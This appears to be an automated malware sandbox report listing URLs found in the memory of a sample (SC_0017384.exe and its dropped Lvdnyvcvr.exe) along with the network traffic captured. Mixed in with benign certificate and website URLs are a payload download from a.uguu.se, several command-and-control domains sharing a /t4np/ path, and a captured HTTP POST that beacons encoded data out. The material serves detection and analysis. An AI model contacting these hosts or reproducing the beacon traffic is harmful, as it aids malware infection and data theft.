          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
          Source: Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://instagram.com/casarpontocom
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
          Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.0000000002832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.net
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.net/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.33347.netwww.33347.net
          Source: explorer.exe, 00000004.00000003.533668803.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.592015514.000000000ED28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.babupaul.comwww.babupaul.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brunaeleandro.comwww.brunaeleandro.com
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emprendizajesocial.comwww.emprendizajesocial.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.evelycosmetique.comwww.evelycosmetique.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.findmyoriginstory.comwww.findmyoriginstory.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.life
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.life/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funhood.lifewww.funhood.life
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.groupekoriolis.comwww.groupekoriolis.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.org
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.org/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.icste-conference.orgwww.icste-conference.org
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.com
          Source: explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.com/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madisoncountylincoln.comwww.madisoncountylincoln.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mejawajib.shop
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mejawajib.shop/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mejawajib.shopwww.mejawajib.shop
          Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.metatv.app
          Source: explorer.exe, 00000004.00000002.584502379.0000000006162000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.metatv.app/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.metatv.appwww.metatv.app
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnsmanagmentsolutions.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnsmanagmentsolutions.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mnsmanagmentsolutions.comwww.mnsmanagmentsolutions.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myprojoints.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myprojoints.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myprojoints.comwww.myprojoints.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pinterest.com/casarpontocom
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.com/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rw-bau.comwww.rw-bau.com
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sistemadanetflix.site
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sistemadanetflix.site/t4np/
          Source: explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sistemadanetflix.sitewww.sistemadanetflix.site
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.uguu.se/fwvfviJb.dat
          Source: SC_0017384.exe, Lvdnyvcvr.exe.0.drString found in binary or memory: https://a.uguu.se/fwvfviJb.dat=
          Source: SC_0017384.exe, 00000000.00000002.382705892.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Lvdnyvcvr.exe, 00000009.00000002.570544457.00000000026DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.uguu.se4Dp
          Source: M61Ae5o9b.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ajuda.casar.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://br.enterprise.wibson.io/banner.js?siteId=78509e00-767d-4326-9529-f0d523c8137c
          Source: M61Ae5o9b.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/es5-shim/4.5.14/es5-shim.min.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
          Source: M61Ae5o9b.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: M61Ae5o9b.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: M61Ae5o9b.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://embed.typeform.com/embed.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://plus.google.com/
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: M61Ae5o9b.8.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see5bad
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/casamentos-reais/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/casamentos/decoracao-de-casamento/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/cha-de-panela/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/lua-de-mel-2/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/dicas-para-noivas/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/noivas/vestidos-de-noiva/
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.casar.com/assunto/organizacao/
          Source: M61Ae5o9b.8.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
          Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
          Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/casarpontocom
          Source: unknownHTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
          Source: unknownDNS traffic detected: queries for: a.uguu.se
          Source: global trafficHTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
